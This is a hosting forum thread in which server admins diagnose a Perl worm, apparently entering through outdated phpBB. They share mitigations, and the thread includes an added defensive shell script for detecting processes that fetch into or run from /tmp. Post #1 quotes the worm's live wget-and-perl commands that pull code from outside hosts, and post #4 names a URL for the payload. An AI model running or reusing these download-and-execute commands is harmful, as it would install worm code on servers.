Thread: Help! bot using my resources

  1. #1
    Member
    Join Date
    Feb 2005
    Posts
    60

    Help! bot using my resources

    I have .linuxdaybot running from my tmp dir.
    There are currently several bots running:

    18367 nobody 0 0.0 0.1 sh -c wget worm.linuxday.com.br -O /tmp/.linuxdayworm;perl /tmp/.linuxdayworm
    18368 nobody 0 0.0 0.2 wget worm.linuxday.com.br -O /tmp/.linuxdayworm
    18421 nobody 0 0.0 0.1 sh -c wget bot.linuxday.com.br -O /tmp/.linuxdaybot;perl /tmp/.linuxdaybot;touch /tmp/.linuxdayinfected
    18422 nobody 0 0.0 0.2 wget bot.linuxday.com.br -O /tmp/.linuxdaybot
    18537 nobody 0 0.0 0.1 sh -c wget worm.linuxday.com.br -O /tmp/.linuxdayworm;perl /tmp/.linuxdayworm
    18538 nobody 0 0.0 0.2 wget worm.linuxday.com.br -O /tmp/.linuxdayworm
    18551 nobody 0 0.0 0.1 sh -c wget bot.linuxday.com.br -O /tmp/.linuxdaybot;perl /tmp/.linuxdaybot;touch /tmp/.linuxdayinfected
    18552 nobody 0 0.0 0.2 wget bot.linuxday.com.br -O /tmp/.linuxdaybot

    I don't know how to make it stop.
    Killing it won't help; it'll start over again, and removing it from tmp just makes it disappear for a minute.

  2. #2
    Member
    Join Date
    Feb 2005
    Posts
    60

    Got it to stop. I put the IP into iptables and the hosts.deny list and restarted Apache.
    It is some Korean website, nbtour.co.kr.

  3. #3
    gorilla, cPanel Partner NOC
    Join Date
    Feb 2004
    Location
    Sydney / Australia
    Posts
    738

  4. #4
    Member gongpro
    Join Date
    Jul 2004
    Location
    USA
    Posts
    12
    cPanel/WHM Access Level
    Root Administrator

    phpbb

    This worm still seems to be going around. I have been hit twice in the last two weeks. During my research of this, I found that one issue allowing this worm in is an outdated phpBB. I believe it was an issue with version 2.0.14 and older.

    At this time, http://www.pivadesign.com.br/rc/linuxdaybot.txt seems to be the source of the file.
    Last edited by gongpro; 03-16-2006 at 02:11 PM. Reason: more info

  5. #5
    Member
    Join Date
    Oct 2001
    Posts
    348

    Hey, guys:
    I encountered the same problem here. I put the IP into the deny list and restarted Apache, then deleted these files in /tmp; it seems OK for now, but I have 2 concerns:
    1. Are there any other files edited by this worm?
    2. How should I correct the phpBB scripts? My phpBB has some modifications by me, and if I just upgrade it, something will go wrong, so I need to find out how to correct the hole in the phpBB scripts. Any advice?

  6. #6
    Member
    Join Date
    Apr 2005
    Posts
    41

    phpBB has mods for every version that describe the changes, as well as files you may use with the patch command in Linux; however, both may fail depending on how your custom modifications have altered the code. The best is to look through the mods and try to apply them one by one, so you will see conflicts and be able to ignore minor differences due to mods.

    Even if you use the patch command and do a partially successful upgrade, it would be better than just trying to figure out holes and fixing them.

    As for the server-related question, it's not possible to predict what may happen, but see WHT for tutorials on securing /tmp. If on a VPS it would be hard to secure that completely, but at the least one can set a cron command to be notified daily of everything with x permission there.

  7. #7
    Member
    Join Date
    Oct 2001
    Posts
    348

    After I chmod 700 wget, it seems OK for now, although phpBB still remains not upgraded.

  8. #8
    Member
    Join Date
    Apr 2005
    Posts
    41

    I don't know, but what about GET and lynx and curl? lynx has a --dump switch; that's why it came to my mind here.

  9. #9
    Member
    Join Date
    Oct 2001
    Posts
    348

    I just found the hacker will use lwp-download to download files, so I just chmod 700 lwp-download.
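
    As an added example (not code from the thread or from any of its posters), the following POSIX shell script does the two checks this thread converges on: it scans a ps-style listing for web-server-user processes that fetch a file into /tmp or run a script from it, the pattern visible in post #1, matching the wget, curl, lynx, GET and lwp-download tools named in posts #7 to #9, and it lists files with any execute bit under /tmp so the output can be mailed from a daily cron job as post #6 suggests. The process listing embedded in the script is constructed sample data modelled on post #1 with the download hostnames replaced by placeholders; the script path in the cron line at the end is an assumption. Restricting execute permission on individual download tools, as posts #7 and #9 do, only raises the bar for one tool at a time, which is why the detection here covers the whole set and also flags interpreters started on /tmp paths.

```shell
#!/bin/sh
# Added example, not code from the thread. Checks for (a) web-server-user
# processes downloading into /tmp or running scripts from it and (b) files
# with an execute bit under /tmp. Sample data below is constructed.

# Constructed sample of `ps -eo pid,user,args` output, modelled on post #1
# (download hosts replaced by placeholder names).
SAMPLE_PS='18367 nobody sh -c wget worm.example.invalid -O /tmp/.linuxdayworm;perl /tmp/.linuxdayworm
18368 nobody wget worm.example.invalid -O /tmp/.linuxdayworm
1234 root /usr/sbin/sshd
2345 nobody /usr/sbin/httpd -k start
3456 nobody curl -s -o /tmp/.payload http://dl.example.invalid/x'

# Print the PIDs of processes owned by the web-server user ($2, default
# "nobody") whose command line either fetches a file into /tmp with one of
# the download tools named in the thread, or runs a script from /tmp.
# $1 is text in the form "PID USER ARGS", one process per line.
suspicious_fetchers() {
    printf '%s\n' "$1" | awk -v u="${2:-nobody}" '
        $2 == u && ($0 ~ /(wget|curl|lynx|GET|lwp-download)[^;]* \/tmp\// ||
                    $0 ~ /(perl|sh|bash|python) +\/tmp\//) { print $1 }'
}

# List regular files with any execute bit set under $1 (default /tmp).
# Uses the POSIX -perm -mode form so it works with both GNU and BSD find.
tmp_executables() {
    find "${1:-/tmp}" -xdev -type f \
        \( -perm -u=x -o -perm -g=x -o -perm -o=x \) 2>/dev/null
}

# Live report for cron. Nothing is printed when both checks are clean, so
# cron's default mail-on-output behaviour only sends when there is a finding.
daily_report() {
    pids=$(suspicious_fetchers "$(ps -eo pid,user,args | tail -n +2)" "${1:-nobody}")
    [ -n "$pids" ] && printf 'Processes fetching into or running from /tmp as %s:\n%s\n' "${1:-nobody}" "$pids"
    execs=$(tmp_executables /tmp)
    [ -n "$execs" ] && printf 'Executable files under /tmp:\n%s\n' "$execs"
    return 0
}

# "report" runs the live checks; any other invocation demonstrates the
# process filter against the constructed sample (prints 18367, 18368, 3456).
case "${1:-demo}" in
    report) daily_report ;;
    *)      suspicious_fetchers "$SAMPLE_PS" nobody ;;
esac

# Assumed cron entry (the script path is an assumption); cron mails any
# output to the job owner:
#   0 6 * * * /usr/local/sbin/tmp-check.sh report
```

    Run without arguments to see the filter applied to the sample listing; install it under cron with the report argument for the daily check post #6 describes. Mounting /tmp noexec, as the WHT tutorials referenced in post #6 cover, stops the downloaded scripts from being executed directly, but interpreters can still read a script from /tmp, which is why the process check looks for interpreters with /tmp paths as well.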

  10. #10
    Member tazman2000
    Join Date
    Feb 2005
    Location
    Liverpool, UK
    Posts
    27
    cPanel/WHM Access Level
    Root Administrator

    I've been hacked twice on the latest IPB board scripts, so I'm currently converting them all to VB, which I've never had any security issues with, having run one for 5 years. Serves me right for going for the cheaper option.
